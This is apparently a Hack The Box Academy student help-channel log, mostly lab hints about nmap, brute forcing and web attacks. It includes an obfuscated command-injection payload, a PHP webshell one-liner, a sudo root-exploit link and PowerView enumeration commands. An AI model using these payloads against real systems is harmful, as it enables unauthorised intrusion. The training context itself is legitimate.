& How do I exclude files over 28k? -exec command?
Try without -sA ?
Was there a reason you were trying an ACK scan specifically?
originally I tried -sV -n 10.129.69.112 and got: "Note: Host seems down. If it is really up, but blocking our ping probes, try -Pn" so thought maybe firewall issue
try sudo before the command and add -size -28k
mind you initially i tried pinging the target ip and got nothing ... even the target machine loaded very slowly so either I am missing something or the servers are acting up today
htb-student is not in the sudoers file. This incident will be reported.😱 😂

LOL sounds a bit dramatic ... but since it said permission denied you need to add sudo before the command as you are calling for all the files including those maintained by root user
I did add sudo and that's the reply I got🤣
which module you on?
yo
Linux Fundamentals:Find Files and Directories : Q1
I would suggest reading the rules.🤦♂️
😱
sorry mate we only know how to hack the box
yah my bad
needed some urgent help
anyone finished the Metasploit Framework module? Need some clarifications with the EternalRomance related question ... I am unable to scan for ports is this a technical issue or am I missing something
Hey, someone can help with the Predictable Reset Token in the Broken Authentication module? I think I have everything in order but it doesn't work
I am confused on which question you are referring to.
DM me
"Use the Metasploit-Framework to exploit the target with EternalRomance. Find the flag.txt file on Administrator's desktop and submit the contents as the answer." I tried to nmap (using -sV and -Pn flag) the ip but keep getting "Host is up. All 1000 scanned ports on 10.129.172.143 are in ignored states."
Use -p- to scan all ports
check the resources link at the top of the module
you dont need nmap. you only need msfconsole
search for ms17
dm me if you still cant get it
sure
anyone online that has completed password attacks?
Where to discuss help on offshore pro labs
🖐️
I'm on the password reuse section and I am a bit confused on what I need to do. I can ssh using the credentials from the previous section, and I can see 2 other users. Do I need to use crackmapexec to brute one of those users? Or is the answer in a readable file?
I have also been searching for a long time. In the end, there is a link in the text of the module that leads you to a password list. Try these passwords
Command injection assessment has anyone got the ||base64 payload to work bash(<<<) blablabla also by encoding c"a"t to read the flag|| ?
nm found it
Hi i am stuck on the same question, I've done all steps with fuzzing, but my responses are css and i can't forward them, can anyone help?
Did you use intruder?
DM me
hey, I am working on hacking wordpress final
but when I scan the site, it was reported not using wordpress
is it normal? I use wappalyzer and wpscan
hint ||the wordpress isn't on that domain||
grab cubes
can someone give me a hint on the Broken Authentication skills assessment? I access the ||support|| user and enumerate other, but can't get the admin panel
the ||support|| isn't an admin user, you have to find the admin user hint ||that user have the admin same code||
omg got it, I kept wondering why there is a useless link
thanks for helping

Can someone give me a second set of eyes? I'm doing the Live engagement under shells and payloads. I know host 1 is vulnerable to a certain payload but the msfvenom payload isn't working nor is the metasploit payload.
can someone help me out with the RDP brute force in the Password Attacks - Network Services?
Hi, what was the value that you got for the number of users? Is it 604? I executed the following using the Neo4j console
MATCH (u:User) RETURN COUNT(u)
Could I get a sanity check for Whitelist Filters on File Upload Attacks?
Hi, I am stuck on Attacking Common Services: Hard. Need your help in MSSQL Transact command. Can I dm someone? #got it Thx
The first scan gave me over 1000 users. The other two were 604. Could have been a mixup.
Has anyone here gotten the security+ cert? If so, how long would you recommend studying for it? Are there any modules on hackthebox that good to do before taking it?
Security+ is a very basic cert. Pretty much everything on HTB is beyond its scope. I would recommend looking at courses on udemy or professor Messer on YouTube
thank you
Can someone help me with the Footprinting module in the IMAP/POP3 section. I don't know where I find the admin email my first idea was that the cto mail is the admin mail but it's wrong
@vital adder can I dm you?
sure
Hello. I am stuck with Skill Assessment - Broken Authentication module. I have found an administrator user and also discovered encoding procedure for cookie. However I do not know how to proceed from here on. When I use the cookie with this admin user, I do not see any flag, in fact, the webpage seems the same as for the normal guest.
Does anyone know any resources that would help with the Hardware challenges?
What's the problem? Have you tried hydra with the provided files?
Hey, is there any module that covers CSRF? I can't find one
Intro to web apps touches on it
Session Security also touches on it a bit, actually a lot. lol
what shell did you try?
@pine dagger is right, use the provided lists and you will get it.
And a little patience because Hydra is not the quickest.
I'm stuck in command injections module --bypassing other blacklisted characters
Use what you learned in this section to find name of the user in the '/home' folder. What user did you find?
please help me guys
hello, anyone who has completed the skill assessment of command injection module?
not sure I remember but u can dm me if u want
hey @tight mesa can you help me with the 7th assignment - bypassing other blacklisted characters bro please
yes, sure DM
i'm on the "Web Service & API Attacks" "Skill assessment". I found the flag but not with the SQLi. The python script works fine for "ExecuteCommand" but idk why when i try to "login" it doesn't give me any result. anyone ?
HELLO
Imma bit stuck at Enumeration with Nmap. I was able to find all of the tcp ports scanned but I got stuck in finding out where is the hostname of the target. I tried different methods in finding the hostname but haven't found it. Would appreciate the tips and help. It mentions how it is "case-sensitive"
Hej! Can someone really help me with the SNMP Footprinting module? I'm totally stuck at the last question where it asks me to "Enumerate the custom script that is running on the system". I can see only one service snmpd service running but dunno how to view the output.
You just need to try with some of the other options. I personally just did it with one of the commands from the service enumeration chapter. 🙂
I appreciate it, maybe there is just some silly mistake on my end.
It's weird because when I type -sV or -sC in the scan it takes a much longer time to load than usual. So I wasn't sure if I had to wait or if something was wrong.
They take longer, yeah
Ahh shoot I got the answer. Looks like I was too impatient to wait was all. Lol
Hello! Can someone tell me how can I avoid this? In the Password attacks - Network Services (RDP), I try to use hydra with the wordlists provided and I keep getting an error that basically hydra keeps trying a username with "" password and then stop because of too many connection errors, after brute forcing with some credentials in the wordlists but not all of them
Thank you but I was able to figure it out. I was using Tun0 as my listener when I should have been using eth1.
FACTS
Hi all, I've just signed up to the academy. Am I guessing right, that if I have any questions about any of the modules etc, I post it in here?
Yep!
Brill!!
Hello.
Can anyone help me in DM for the intro to packet network analysis module ?
Hi, @rain marlin Were you able to resolve this? I got stuck here as well
Does anyone have a good command to only pull out the first names from dig output?
Maybe with grep.
JavaScript Deobfuscation
Decoding:Using what you learned in this section, determine the type of encoding used in the string you got at previous exercise, and decode it. To get the flag, you can send a 'POST' request to 'serial.php', and set the data as "serial=YOUR_DECODED_OUTPUT".
i believe i have the correct answer but i don't know how it wants it formed
can anyone help?
Lol nope I went to another mod, will come back later and try and figure it out unless someone throws some help with it lol;
Let me know if and when you do
Ok, I'll keep at it first. Not that burned yet.. haha!
Yeah got to the end of the mod and was working on the project and got stuck left it for awhile and came back, thought it'd be a good idea to start over and something must have changed in steps of the mod don't remember some of the stuff in it;
Probably should have kept at it;
@rustic sage DM me 🙂
anyone for webproxies skill assessment?
Sorry for late reply, I was using the resource files and hydra with both the username list and the names implied by the users found with winrm
I tested it less than 2 hours ago, and it works fine.
Follow the RDP example
Got it to work. Apparently I missed the step that I should configure the firewall
What was the step?;
I'm not sure if you did that step, but if you haven't that's what you should do
Have to allow inbound traffic in public profile
You can find the specific rule, but I didn't anymore. I just allowed any incoming traffic for the public profile
The step is not explicit. I re-read the following section after the instruction to try to connect to the Share
in the firewall config setting?;
Yes
Awesome thanks, I'll try it and see if that was my problem;
I’m working through the nibbles Initial foothold problem in the getting started module. I’m running the curl commands as shown in the lesson but they take forever to run, if they don’t timeout first. Does anyone know why this is happening?
Hi, i need some help with HTB academy SSTI Exploitation Example 1
@covert stag DM me 🙂
@opaque badger what are you trying to curl? Feel free to dm, worked through it a few days ago!
hi! may I get some sanity check / nudge with Cross-Site Scripting (XSS) Skill Assessment pls?
no jared already helped me
was a little thing
i used exec
no spoiler
sorry u werent talking to me
im way 2 high man
lifeless completing htb academy modules
brain cpu is getting hot
sorry 4spam
how to start hacking , i know nothing i know the intermediate python that's all
@uneven arch https://academy.hackthebox.com/
Stuck on Footprinting - IMAP/POP3. Looking for email address, enumerated both services, checked both services under the user/pass provided, 0 emails in both
any help would be great!
Ask the question 🙂
The whole module went very quickly and well but I'm stuck on the skill assessment part for the last 2 hours, literally. I tried numerous payloads in all fields (comment, name, email, website). I tried "escaping" the "html sandbox" of wordpress etc etc... I tried googling Wordpress comment xss.. but I'm just stuck . I guess I'd need some nudge in the right direction, I'm sure I'm missing something obvious at this point
as it goes I figured it out shortly after posting here lol. If anyone else is stuck on the same part feel free to reach out!
Oh. Hrm. You can literally do it with the same tricks from the Session Hijacking module. 🙂
and that's exactly what I meant... I just tried again, LITERALLY the same payload I used with Session Hijacking and it worked..... well.. thanks ^^
Oh yeah, I had that happen a couple times. Just need to follow the OSCP mentality I guess.. Try Harder 😄
running against the wall until it breaks to get into the building is not very efficient but looking around to find the entry is way smarter and doesn't require that much effort...
so try smarter
Isn't that what Try Harder means?
do you think running against a wall is smart?
I meant, Trying Harder, is also Trying Smarter. 😮
then it should be called "Try Smarter", shouldn't it?
"Thoroughly exhaust all options"
Well, if you want to criticise OS's motto, go right ahead. Not going to bother me.
Trying smarter would boost our marketing strategy ❤️
i am not going to criticise anyone's motto, its about the way of interpretation but what i want to point is that you're actually aware of your own interpretations
Imagine
The point that I was making was more that, things don't always work first time or quickly. Sometimes, trying multiple times does make it work. If it never works, then you find another method.
Agreed with this one

agree, but trying the same thing multiple times and expecting different result is like running against a wall (if you know what i mean 😉 )
finding another method is what i meant by looking for the entry
Oh, I agree. But always worth verifying whether it actually failed, or whether it was just a bit of network glitchiness.
agree on that one too, you're not wrong - just want you guys to become better by taking things/information more precise
and think about what you see
Learning process module has been updated and recently I read - there could be n number of things which could go wrong with a piece of technology, so the most obvious way might be the most probable as well
for example seeing tcp/80 open doesn't mean its a web server, it also can be some other service, right?
Them be running ftp sometimes
hello
hi
hi
what do you think of those updates?
Just read through one section, which I talked about
And updates are amazing as usual
It feels like I'm having a beautiful conversation with some very like minded individual
I really wanna contribute back to the HTB academy
Last year Ben contacted me I guess, I was having some tonsils issue and he was getting married ❤️
So I couldn't hop on a call with him
But now that I'm doing the academy modules
I've the same spirit to contribute back
I'll actually blog about what it means to me, personally, as using HTB academy
I've used literally everything at this point, almost every named educational platform, I'm having active subs too
appreciate that!
feel free to DM me when you finish reading the Learning Process updates, always happy to hear feedback
But HTB academy I'll place it on the top,
Its like a religious place to me
I'm only about 55% through the modules 😦
keep working on it, its not about the completion, its about to get better and improve
Its more trying to find time for it than anything else. I started about 2 months ago, and worked through all tier 0, tier 1 stuff. About 50% through tier 2 easy stuff, then onto tier 2 medium o/
Stupid work slows me down 😦
maybe it slows you down a bit but it doesn't stop you, right?
it does when I spent 17 hours straight coding to fix a problem
has anyone had a problem installing droopescan ?
well try the ROQ model
this might help you to reduce the amount of time to fix a problem
it was more trying to work around a bug in a product by using the API commands available to me, which drastically limited what I could configure/achieve on the system. Fixed it though. And it worked and looks flawless now. Of course. it'll now suffer from "works on dev machine" issue.
btw, was there some issues with the VPN stability about 6-8 weeks back? I was getting a lot of timeouts between pwnbox and targets.
Hi guys, I am working on the DNS module of Footprinting. Like a lot of people on here I am stuck at "What is the FQDN of the host where the last octet ends with "x.x.x.203"?". I have gotten as far as identifying the transfer. any help would be appreciated.
@vapid isle DM me 🙂
Hi I'm working on the metasploit framework and I'm stuck on sections and jobs. On the last question with the outdated sudo version. I already have a shell and I found the exploit (the one on github). But the exploit does not work. Am I doing something wrong?
Hey, regarding module 18 section 80 (Linux Fundamentals - Filter Contents)
For cURLing the inlanefreight website: what exactly is considered a unique path?
Is ".../file.php/news/" considered non-unique compared to "...file.php/contact/"?
And are also file extensions included for these unique paths?
I was challenged with that definition also. If ever, you can start with the most lax definition (and start to tighten). On reflection, I think the Occam's razor concept would have helped me here 😅
neither pwnbox nor my personal vm seem to be able to install apache. am i just thick as mince?
no matter what i try it keeps coming up connection refused error 405 method not allowed
Hello, I hope I'm not being thick headed but I'm working on Getting Started: Privilege escalation and I'm stuck on question 2 on how to escalate privileges for user 2 to root. I would appreciate it if someone could give me a hint or point me in the right direction. I'm trying to use CHMOD command on the flag.txt file but am stuck on getting around the password
@dull furnace try looking for ||an ssh key in the root directory :)||
So i don't see an ssh key listed here only the flag file
unless i need to create one?
thanks, I will apply that, funnily I started reading the Occam's Razor section a few minutes ago 😄
you are right it was hidden thank you
Could someone help me with File Inclusion - Basic Bypasses?
I've been trying some stuff but it isn't working at all 😭
@normal laurel make sure you are using the right path ||/index.php?language=languages/||
try using ||four dots and two slashes||
no luck
DM me
kk
Finally completed it. Lol
Feels like finally cleaning your room, got that out of the way;
Hi guys. New to the OSCP world. I'm having a heck of a time on the https://academy.hackthebox.com/module/77/section/859 knowledge check.
I managed to get a foot hold but cannot for the life of me figure out how to get the privilege escalation to get to root.txt flag.
Been trying to figure out linpeas but everything i find is referring to the .sh file and all I can find is the Peass-ng.
Not sure what I'm doing was hoping for a point in the right direction.
Very excited to be on this journey, would love to get my OSCP cert. Thank you!
@strong creek try running ||sudo -l , there is a GTFObin we can abuse :)||
anyone around complete windows priv esc?
I've finished it. what do you need?
Hi, I'm stuck on the last question (https://academy.hackthebox.com/module/39/section/415). I know that the ||sudo version 1.8.31|| is running and that there is an exploit ||(https://github.com/mohinparamasivam/Sudo-1.8.31-Root-Exploit)|| but I do not manage to run it I always get the error Segmentation fault (core dumped)
what am i doing wrong?
Web attacks assessment, I keep on getting access denied when i try to change the pass. Any heads up? (token and uid are correct tho)
try changing request to ||GET||
I tried that i get ||missing parameters||
did you change it by hand or use "Change request method" in burp repeater
aaaah i see, ty 
Hi, I have problems with Bypassing Security Filters in Web Attack module. I tried every request method from PUT to POST, however I always get Malicious Request Denied!. You can DM me.
I have received the needed clarification, thanks for asking though
I am in module Active Directory Enumeration & Attack in section ACL Enumeration
The text says that this command could take 1-2 minutes.
`Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
PS C:\Users\htb-student> cd c:\tools
PS C:\tools> Import-Module .\PowerView.ps1
PS C:\tools> $sid = Convert-NameToSid dpayne
PS C:\tools> Get-DomainObjectACL -Identity * | ? {$_.SecurityIdentifier -eq $sid}`
But even after 10 minutes I don't get a result.
What am I doing wrong?
After more than 20 minutes, the command has run through. Without result.
Is it possible that the SID is wrong?
Hi. I'm having a hard time submitting the answer on the Javascript Deobfuscation module - decoding chapter. I made the post request and used base64 to convert the response and it came out: 7h15_15_a_s3cr37_m3554g3
But when I submit that I get incorrect answer message. Is it a known issue?
You have to write the flag in || HTB{} ||
eg. || HTB{yourflag} ||
Hi, it should be $sid = Convert-NameToSid forend 😀
Thanks. I tried that too. Still not working
you're missing the last step... read the last part of the question.
Thanks
OH! You're right! I didn't realize that I actually have to replace the 'YOUR_DECODED_OUTPUT' part 😆
Hello can someone help with a hint on the file inclusion skills assessment section.
I have found the ||admin panel|| and have found which log path that is the right one.. I think.. The ||nginx || one.
I have tried to put in the php get cmd from the poisoning section but without any luck
Feel free to reply here or dm 🙂
I got PTSD from that module ... here is a hint, what else can you poison?
Hi, all. I'm at my wits end with Find Files and Directories (Linux Fundamentals) part about using the find tool. No matter what I put it keeps coming up saying that permission is denied and that the htb-student is not in the sudoers file. I've tried about 10 different variations on all of it, most of it suggested from Google searches and Reddit pages, all with the same result. Can anyone tell me what I'm missing here
are you referring to first question?
Yes, "What is the name of the config file that has been created after 2020-03-03 and is smaller than 28k but larger than 25k?"
No matter what I try, I always get "htb-student is not in the sudoers file. This incident will be reported" or a list of "permission denied" if I don't put the /dev/null in
Even a simple query such as find / -type f it gets me nowhere, with similar results. It's as if the Pwnbox doesn't allow it!!
ok dm me the command you sent
close the terminal and open it again. Do not use sudo find... but only find
Same again after a reboot. Going to try via VPN through my own VM and see if that works
Hello,
I am currently stuck at Broken Authentication - Bruteforcing Passwords, mainly because of a max tries security mechanism. It is a brute force exercise, so max tries is a pain here. Am i missing something to circumvent it ?
Anyone know what wordlist I should use for the last question on Information Gathering - Web Edition - Virtual hosts: Find the specific vHost that starts with the letter "d" and submit the flag value as your answer (in the format HTB{DATA}). I have tried a handful and im not getting any that start with D
I can't remember exactly but i don't think i had to use other than the smallest ones from SecLists\Discovery\Web-Content or maybe Discovery\DNS
use namelist at SecList\Discovery\DNS
Hi, is anyone free to help with the module Active Directory LDAP?
That was the ticket. Thank you.
you don't need to bruteforce it, do as the question ask, use rockyou-50.txt and filter by the password policy, you will get one or a few passwords only
I think I got blocked too, so I use the last passwords left in the question instead of the machine
Thanks for pointing my mistake. I was using the full rockyou list 🙄
Hi guys sorry for disorder, I have the following problem with this box, can someone help me please
You're welcome
Nice 😉
Dm if you havent solved yet
Dm
Hi, im doing the bash module and i have a little problem (again), when i run the script of loop exercise it returns a message: "***WARNING : deprecated key derivation used." and suggests me to use another flag but idk if its the same decoding method and i need the same cuz it should give me the flag code to finish the section. what should i do?
modify the bash script
if you cant figure it out after a while dm me
I think I actually used the bash script you create in the comparison operators in order to do the base64 encoding then I manually plugged the output from that into the script they provided in the loops section.
ah i understand, search an alternative method instead repair the code could be easier
well if you look at the example bash script they give you, you're supposed to create a for loop, you already did the work for that in earlier sections. In the comparison operators section you created a for loop that does base64 encoding
yes, so i should retrieve the code after the loop and search a way to use it in the function with another method, right?
Take the variable "9M" and base64 encode it 28 times using the script you created in the comparison operators section. Pipe the output into WC (word count), take that number and plug it into the salt variable of the script they give you in the loop section.
ok ill try it
ya that script loops 40 times modify it a little make it loop 28 or 29 times
with a for i in {1..28} ?
hi, currently on "attacking common application" "skill assessment 1" think i know the exploit but can't use it. can't find info about ||servlet||
got it!!
you can use any variable I just used i but you can use any character doesnt matter
it's just to create a loop that iterates 29 times
i didnt see the "count the characters part"
yes, is really easy when you read it well 🤡
again, thank u a lot
👍
any one do footprinting module could use a nudge on the medium lab so far I have scanned open ports on NMAP, mounted the nfs share and found credentials for alex, used alex credentials on smb share and found the "sa" credentials and not sure what to do next.
Struggled through it earlier today 🙂 Make sure to read the hint, especially if you have already found those credentials. Feel free to dm
I probably will made a little more progress just managed to rdp into the windows machine with alex credentials had not done that before
Hello, one question
During MS fundamentals module, 1st section asks me to RDP using a provided command, do I have to use said command in the workspace or do I need to connect to the vpn and use it on my end to connect to the workspace's machine?
Sry if silly question, just a bit confusing
probably using xfreerdp. Yes use it in pwn box or your own vm or computer while connected to academy vpn tunnel
I'm trying to use it from the box that spawns in the lesson, but it doesnt work
This is all i seem to be getting
what command are you using?
sometimes can be good to exit out close your current terminal open a new one or disconnect and reconnect to the vpn
or refresh the target i.p reset the machine
xfreerdp with the correspondent parameters, /v, /u, /p, all parameters are also provided, so really is almost copy/paste
on windows fundamentals what section title are you at? So I can go into it and have a better idea what you're dealing with
ill DM you
Hi, I'm stuck in the Skills Assesment section of the Web Service & API Attacks module.
I've managed to both get root access and dump the database, but can't find any passwords.
Feel free to reply here or dm, thanks!
you wont find any. You need to enumerate the nodejs files.
did you fuzz for extensions?
Hello friends
hey Jared
I am hating this Password attacks module. It takes FOREVER to crack passwords.
Currently on Attacking active Directory, trying to find the username and password given 3 names.
if you need a nudge let me know
I think im on the right path just have to be patient. I made a user list from the 3 names. Only thing I might be off on is trying crackmap with smb
Guys
sup d00d
When you have the silver annual plan you don't get cubes, right?
I have completed some modules and my cubes are on the same number, it seems that I'm not earning anything
not sure dawg i have never been on a plan
anyone ?
EDIT: Thx @west canopy
@grave dust DM me 🙂
freaking helps to use the right password list lol
cracked all 3 in less than a minute using the right list
For command injections exercise 7 (Bypassing Other Blacklisted Characters) could someone point me in the right direction please for which environment variable to use? Tried using only LS_COLORS variable to no avail, although ping does output successfully which I'm guessing my LS_COLORS command is failing.
||127.0.0.1${LS_COLORS:10:1}${IFS}${LS_COLORS:14:1}${LS_COLORS:1:1}${IFS}${HOME:0:1}${LS_COLORS:24:1}${LS_COLORS:39:1}${LS_COLORS:23:1}${LS_COLORS:152:1}||
@eager rivet i was able to solve it using ||only ${IFS} and ${PATH:0:1}||
same here
Not sure how but thanks both, I'll keep trying 🙂
Whenever I put in text though the ping command output is blank, this is where I'm unsure how you've managed to insert text after the / and have ls in there
DM me and we can discuss in detail
Using Web Proxies
Run ZAP Scanner on the target above to identify directories and potential vulnerabilities. Once you find the high-level vulnerability, try to use it to read the flag at '/flag.txt'
can anyone tell me why it is incorrect
make sure you dont have a space in there somewhere
No there is no space
there has to be something. it looks correct to me.
Hey guys sorry to butt in on this convo but I'm trying to ping one of the newbie modules and I'm having 100% packet loss. I tried restarting the target box a few times but nothing seems to work.
check your vpn
make sure you only have one tun interface
if it's a docker target it might not be pingable
Hello guys, this is a dumb question but I did not figure it out.
"Except for using meterpreter shell, how to download a file from Windows to Linux via command line?"
In windows, there is no python so that I cannot setup a simple http server
you could transfer a netcat binary to the windows machine , then use that to transfer files off of it.
ftp?
I did try scp, ftp but does not work because my Kali connect to target windows via openvpn
How to do that? Can you write out command on both side?
ok so lets pretend we want to move root.txt from the windows machine to our attack box
i already have a shell. First i will transfer over a netcat binary
Now on my attack box i start a netcat listener, redirect standard output into the name of the file we want to receive (root.txt)
then run netcat from the windows machine like this
and then if we look back on our attack box we can see the incoming connection, give it a few seconds to finish, then we can read the flag
@west canopy
Hehe thank you so much 🙈 is there any other way from netcat?
I believe it is a docker target. Not 100% sure though, I just started yesterday.
yep thats a docker, typically u cant ping them and they only have the one port open
ahh that's a pain in the ass because I have to identify services running on the server
Getting Started module?
Yeah
i think we can just ||copy/paste the ip and port into our browser :)||
that worked in my pwnbox thank you so much
np 🙂
Can i shoot you a DM as to not clutter the chat?
clear
sure
Can I dm someone about getting a foothold on the Password Attacks Lab - Hard, I've been bruteforcing the ||rdp ||service for two days now, but so far everything has been unsuccessful 😕
so, i am curious
i am doing the "Server-Side Attacks - Skills Assessment" and it says get the flag with server side attack without registering
what happens if i register?
did you use the mutated wordlist?
There is no flag here. Get back to hacking!
I have been stuck on the nibbles web footprinting module for a while now. Every time I attempt it I can't seem to run any of the commands taught in the lesson because they always time out. Any ideas on what the issue may be would be greatly appreciated
It has come to my attention I had 7 vpns running thank you coming to my tedtalk
hello
You started another one to get 8 right?
yo uh, how do i set openvpn up when the GUI doesn't evenload
the gui where?
before i even continue on, am I supposed to setup openVPN on the VM I'm using? sorry if the question sounds dumb since I'm newer to this stuff
all good
if you are using a vm that isnt pwnbox then yes you will need openvpn
if you are on linux you shouldnt need a gui, just
sudo openvpn /path
doesn't work
1 sec
Saying error opening configuration files
I haven't even setup ovpn on the VM yet, if that helps
ok you are on a linux?
using virtualbox to run a kali debian linux OS yes
and have you downloaded that file?
starting_point file? yes
the .ovpn?
dm
@limpid wharf, or anyone else who might be able to help -- I'm stuck on the "What is the hosting provider for the inlanefreight.com domain?" question in OSINT module (everything else in module done). Am about to try and brute-force the provided "hint" thru Burp (even though I suspect while it's not "wrong", there's more to it than that), but that's how at wits-end I am... presuming you've completed it, any nudge would be greatly appreciated. Thank-you. Thanks for the help AeonArchon -- don't know how anyone is possibly supposed to put that together... I mean, MacGyver may be able to take a rubberband, a paperclip, and a gum wrapper and hack a satellite in space, but even that makes more sense than the solution to this one.
send me the link in dm ill give you hints
hello
can someone help me on this question
Our client wants to know if we can identify which operating system their provided machine is running on. Submit the OS name as the answer
on network enum wit nmap easy lab i couldnt figure out the os
keep saying no exact os match
tried -A -o
yup, i used hydra and the user name provided in the exercise and went through the entire mutated word list, it takes about 8 hours with 4 threads. I got nothing. Maybe I should try to use another tool to bruteforce rdp?
oh the password is in the top 1100
shoot me a dm if you still need help i'll tell you where to cut the wordlist this is a bit to much spoiler
I got it! ty! it was a problem with my password list. I needed to recreate it.
in future if something on htb takes more than a few minutes (MAX) to bruteforce you are doing something wrong, there are rules in place about brute-forcable passwords not taking too long because some people might be using shitter machines
scan one of the service on that box and see which os is that service for
yeah the general rule is if you brute force something for too long you are doing something wrong (except some hell box)
Any hints on how you solved this??
Uhm hi, I'm new can someone guide me?
Take a look at this path. To start probably exactly the right thing:
https://academy.hackthebox.com/path/preview/information-security-foundations
Hey, Login Brute Forcing Skills Assessment, 2nd (very last) brute forcing won't crack. I know the username and I'm using the supplied (and hinted) passw list. What am I missing..?
Hi
Any hints on attacking common services easy? I found credentials and am able to upload files (php reverse shell) but not sure how to access/execute it.
can someone explain to me why the gitlab user enum script works on the pwn box but not on the local machine? i get unexpected syntax but for some reason it works great on the pwn box
Feel free to DM me
Have a look at the database
The script may need other modules. So it has dependencies.
They are probably installed on the PwnBox, but not on your system.
That makes sense, ty
Is there something other than the password hash there?
DM
btw do u possibly know which module/dependency it is?
No, unfortunately not. But usually when you download a script somewhere, it will show you what dependencies there are.
ill look for it much thanks again
Hi,
I am stuck on Broken Authentication - Predictable Reset Token, first question.
I can't figure how to reproduce show token for htbuser using the algo. I am using strtotime(2022-08-04 01:15:52pm) * 1000 to convert to epoch with milliseconds. Maybe this is where i am wrong.
Or maybe i am not supposed to reproduce the htbuser token ....
I can obviously guess the answer to
From your scans, what OS type is running on the target?
But maybe I am missing something with nmap -O
I turned on OS detection however this is my output
➜ hack-the-box sudo nmap -O 10.129.185.38
Starting Nmap 7.92 ( https://nmap.org ) at 2022-08-05 00:44 AEST
Nmap scan report for 10.129.185.38
Host is up (0.66s latency).
Not shown: 999 closed tcp ports (reset)
PORT STATE SERVICE
21/tcp open ftp
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.92%E=4%D=8/5%OT=21%CT=1%CU=43283%PV=Y%DS=2%DC=I%G=Y%TM=62EBDB8D
OS:%P=x86_64-pc-linux-gnu)SEQ(SP=105%GCD=1%ISR=10C%TI=Z%CI=Z%II=I%TS=A)OPS(
OS:O1=M54BST11NW7%O2=M54BST11NW7%O3=M54BNNT11NW7%O4=M54BST11NW7%O5=M54BST11
OS:NW7%O6=M54BST11)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6=FE88)ECN(
OS:R=Y%DF=Y%T=40%W=FAF0%O=M54BNNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS
OS:%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=
OS:Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=
OS:R%O=%RD=0%Q=)T7(R=N)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%R
OS:UCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)
Network Distance: 2 hops
OS detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 38.06 seconds
Nevermind, running with -A worked.
Need a nudge on Whitelist Filters - File Upload Attacks. So far, I altered the bash script to include other php type extensions and I get a ton of file upload successful (193) but do we need to enumerate all of these? Noticed that many of these when uploaded you get a 404 file not found when trying to execute a command over your webshell
if your payload was upload successful but there is some issue with your payload try this <?php system('linux command'); ?>
I'm on the Metasploit Framework module and when I run exploit to the target I get; Service start timed out, OK if running a command or non-service executable... [*] Exploit completed, but no session was created.
When I run nmap on the target it says Windows Server 2008 R2 but when I run the exploit it says Windows Server 2016....😱
I did copy and paste the IP so... I couldn't have made a mistake with the target...?.

@obtuse saddle maybe use scripts
need help in "Information Gathering - Web Edition" on the question "Find and submit the contents of the TXT record as the answer." in Active Subdomain Enumeration tab. i got a flag but it didn't work . can i DM anyone for help??
in windows fundamentals ntfs vs share permissions what firewall settings we have to change in order to allow connection from smbclient
is it optional to not register for "Server-Side Attacks - Skills Assessment"
like is it unnecessary to register or is it necessary not to register?
Does in influences the assessment
?
let me guess i need a specic aacc for ssti or something
sorry if i spoil
lets put some effort in it obito...
🤨
there are multiple accounts registered😩
nope wait my bf did something wrong. im too stoned to program
hihihi
can I get some nudges with Broken authentication Skill assessment? I know how to craft a cookie and I know of 2 users, and I know how to enumerate more. But I can't seem to find more. I know it's a prefix, I just cant seem to find the syntax for the suffix
hit me up.
@willow sequoia
hey guys i finished the footprinting module except one question in the DNS part.
"What is the FQDN of the host where the last octet ends with "x.x.x.203" ?"
I found 2 zones but it's in neither of them and tried several wordlist with gobuster without success. anyone ?
EDIT : thx @acoustic owl for the help
Feel free to DM me
ive not got there yet, sorry, but any tips on the "weak token generation" question - im trying to generate a bunch of hexdigests of the md5 of username + timestamp, but wondering if python's "time()" is doing the right thing, ie microseconds and timezone
I'm not sure. I didn't use time, I used strptime and strftime
from the actual header?
I need a little nudge in the right direction on Password Attacks > Credential Hunting in Linux. I have tried CME on smb but it just says everything is correct. SSH I have yet to find a user/password combo.
no, from the printed message. which is in seconds, and they state it's +-1 seconds anyway. So I kind of bruteforced it lol
I can help
thx but @acoustic owl helped me 🙂
DM me
DM me
can i pls dm someone i need some guidance with SSTI Exploitation Example 1
no fuck
i mean Server-Side Attacks - Skills Assessment
lol no fuck?
sometimes its fine to just be friends
ah so you took the " and was generated at 2022-08-04 11:22:33" and just made a unix timestamp from that, then +- 1s?
exactly. just make sure you make it a unix millisec timestamp not a normal sec one
Hello friends, I am on https://academy.hackthebox.com/module/112/section/1067 and I am stuck on the last challenge: What is the full system path of that specific share? I do not know how to find the path being that it should be a linux pathway and not a C:/ for example,
In Linux, the root directory is /
yah I know ive already tried /home/sambashare and /\home\sambashare
the path is in your print screen.
|| Replace C:\ with / ||
omg... i just realized ive been putting in sambashare instead of sambauser smh let me try this again
/\home\sambauser\ --> this also did not work
DM
back to Attacking Common Applications
thanks! i got helped now
why do i always feel dumb when doing htb shizzle...
i know 😉
Because if you knew everything already, you probably wouldn't be studying at the Academy 😉
haah true
u shall never know everything
i dont like that idea
im curious in nature
so i wanna know everything
2bad ur lifespan is not long enough
until we can upload our consciousness in the cloud
post human transcendence
I ran a command for over 40 minutes today. Actually out of pure desperation, because I saw no other way.
In another window I tried other things, but did not work. Just before Lab expired, my command finally worked and I got what I was looking for....
luckyyyy
thats how it is for Password attacks. Everything takes so long
It was in the Module Active Directory Enumeration & Attack
Hello!
I'm currently having troubles with a section.
I have to get a mount point but the command provided returns this
Windows Fundamentals, NTFS vs Share points btw
Using rockyou-50.txt as password wordlist and htbuser as the username, find the policy and filter out strings that don't respect it. What is the valid password for the htbuser account?
i got past the first half of the question which is finding the format but to get the password from rockyou-50.txt i cannot seem to find
DM me
